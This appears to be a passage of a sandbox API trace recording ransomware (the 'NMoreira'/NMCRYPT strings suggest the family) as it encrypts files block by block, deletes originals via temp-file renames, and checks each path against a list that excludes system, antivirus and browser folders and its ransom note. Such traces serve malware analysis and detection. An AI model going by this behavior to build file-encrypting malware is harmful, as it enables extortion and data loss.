1 [0152.623] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.624] GetLastError () returned 0x0 [0152.624] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.624] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.624] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.624] GetLastError () returned 0x0 [0152.624] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.624] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.624] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.624] GetLastError () returned 0x0 [0152.624] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.624] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.624] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.624] GetLastError () returned 0x0 [0152.624] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.624] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.624] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.624] GetLastError () returned 0x0 [0152.624] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.624] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.624] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.624] GetLastError () returned 0x0 [0152.624] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.624] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.624] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.624] GetLastError () returned 0x0 [0152.625] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.625] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.625] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.625] GetLastError () returned 0x0 [0152.625] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.625] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.625] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.625] GetLastError () returned 0x0 [0152.625] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.625] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.625] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.625] GetLastError () returned 0x0 [0152.625] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.625] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.625] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.625] GetLastError () returned 0x0 [0152.625] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.625] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.625] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.625] GetLastError () returned 0x0 [0152.625] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.625] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.625] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.625] GetLastError () returned 0x0 [0152.625] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.625] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.626] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.626] GetLastError () returned 0x0 [0152.626] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.626] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.626] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.626] GetLastError () returned 0x0 [0152.626] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.631] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\join.avi") returned 1 [0152.631] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\join.avi")) returned 0 [0152.632] wcscpy (in: _Dest=0x2d7dcb4, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\join.avi" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\join.avi") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\join.avi" [0152.632] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\join.avi" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US") returned 1 [0152.632] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7debc | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\.xXC747.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\.xxc747.tmp")) returned 0xc747 [0152.633] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\join.avi"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\.xXC747.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\.xxc747.tmp"), dwFlags=0x1) returned 0 [0152.633] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\.xXC747.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\.xxc747.tmp")) returned 1 [0152.633] CryptDestroyKey (hKey=0x9ad8b8) returned 1 [0152.633] wcslen (_String="OK") returned 0x2 [0152.633] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0152.633] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0152.633] CryptDestroyKey (hKey=0x9ad138) returned 1 [0152.633] CryptDestroyHash (hHash=0x9ad578) returned 1 [0152.633] CryptReleaseContext (hProv=0x8e3aa0, dwFlags=0x0) returned 1 [0152.633] PathMatchSpecW (pszFile="micaut.dll.mui", pszSpec="*NMCRYPT") returned 0 [0152.633] PathMatchSpecW (pszFile="micaut.dll.mui", pszSpec="*Recovers your files.html") returned 0 [0152.633] PathMatchSpecW (pszFile="micaut.dll.mui", pszSpec="*.exe") returned 0 [0152.633] PathMatchSpecW (pszFile="micaut.dll.mui", pszSpec="*.dll") returned 0 [0152.634] PathMatchSpecW (pszFile="micaut.dll.mui", pszSpec="*.lnk") returned 0 [0152.634] PathMatchSpecW (pszFile="micaut.dll.mui", pszSpec="*.bat") returned 0 [0152.634] PathMatchSpecW (pszFile="micaut.dll.mui", pszSpec="*.ini") returned 0 [0152.634] PathMatchSpecW (pszFile="micaut.dll.mui", pszSpec="*.msi") returned 0 [0152.634] PathMatchSpecW (pszFile="micaut.dll.mui", pszSpec="*.scf") returned 0 [0152.634] PathMatchSpecW (pszFile="micaut.dll.mui", pszSpec="*pagefile.sys*") returned 0 [0152.634] PathMatchSpecW (pszFile="micaut.dll.mui", pszSpec="*NTUSER.DAT*") returned 0 [0152.634] PathMatchSpecW (pszFile="micaut.dll.mui", pszSpec="*AppData*") returned 0 [0152.634] PathMatchSpecW (pszFile="micaut.dll.mui", pszSpec="*\\winrar\\*") returned 0 [0152.634] PathMatchSpecW (pszFile="micaut.dll.mui", pszSpec="*\\Internet Explorer\\*") returned 0 [0152.634] PathMatchSpecW (pszFile="micaut.dll.mui", pszSpec="*\\java\\*") returned 0 [0152.634] PathMatchSpecW (pszFile="micaut.dll.mui", pszSpec="*\\TeamViewer\\*") returned 0 [0152.634] PathMatchSpecW (pszFile="micaut.dll.mui", pszSpec="*\\windows\\*") returned 0 [0152.634] PathMatchSpecW (pszFile="micaut.dll.mui", pszSpec="*\\ESET\\*") returned 0 [0152.634] PathMatchSpecW (pszFile="micaut.dll.mui", pszSpec="*\\AVG\\*") returned 0 [0152.634] PathMatchSpecW (pszFile="micaut.dll.mui", pszSpec="*\\AVIRA\\*") returned 0 [0152.634] PathMatchSpecW (pszFile="micaut.dll.mui", pszSpec="*\\AVAST Software\\*") returned 0 [0152.634] PathMatchSpecW (pszFile="micaut.dll.mui", pszSpec="*Atheros*") returned 0 [0152.634] PathMatchSpecW (pszFile="micaut.dll.mui", pszSpec="*Realtek*") returned 0 [0152.634] PathMatchSpecW (pszFile="micaut.dll.mui", pszSpec="*bootmgr*") returned 0 [0152.634] PathMatchSpecW (pszFile="micaut.dll.mui", pszSpec="*boot*") returned 0 [0152.634] PathMatchSpecW (pszFile="micaut.dll.mui", pszSpec="*boot*") returned 0 [0152.634] PathMatchSpecW (pszFile="micaut.dll.mui", pszSpec="*CONFIG.SYS*") returned 0 [0152.634] PathMatchSpecW (pszFile="micaut.dll.mui", pszSpec="*IO.SYS*") returned 0 [0152.634] PathMatchSpecW (pszFile="micaut.dll.mui", pszSpec="*MSDOS.SYS*") returned 0 [0152.634] PathMatchSpecW (pszFile="micaut.dll.mui", pszSpec="*NTDETECT.COM*") returned 0 [0152.634] PathMatchSpecW (pszFile="micaut.dll.mui", pszSpec="*ntldr*") returned 0 [0152.634] PathMatchSpecW (pszFile="micaut.dll.mui", pszSpec="*chrome*") returned 0 [0152.634] PathMatchSpecW (pszFile="micaut.dll.mui", pszSpec="*opera*") returned 0 [0152.634] PathMatchSpecW (pszFile="micaut.dll.mui", pszSpec="*firefox*") returned 0 [0152.634] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\micaut.dll.mui", pszSpec="*") returned 1 [0152.634] strlen (_Str="NMoreira") returned 0x8 [0152.634] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.634] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.634] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.634] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.634] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.634] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.634] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.634] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.634] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.634] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.634] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.634] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.634] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.634] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.635] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.635] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.635] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.635] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.635] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.635] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.635] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.635] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.635] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.635] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.635] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.635] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.635] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.635] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.635] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.635] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.635] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.635] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.635] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.635] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.635] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.635] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.635] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.635] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.635] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.635] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.635] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.635] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.635] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.635] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.635] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.635] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.635] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.635] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.635] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.635] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.635] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.635] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.635] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.635] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.635] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.635] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.635] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.635] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.635] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.635] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.635] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.635] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.635] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.636] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.636] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.636] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.636] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 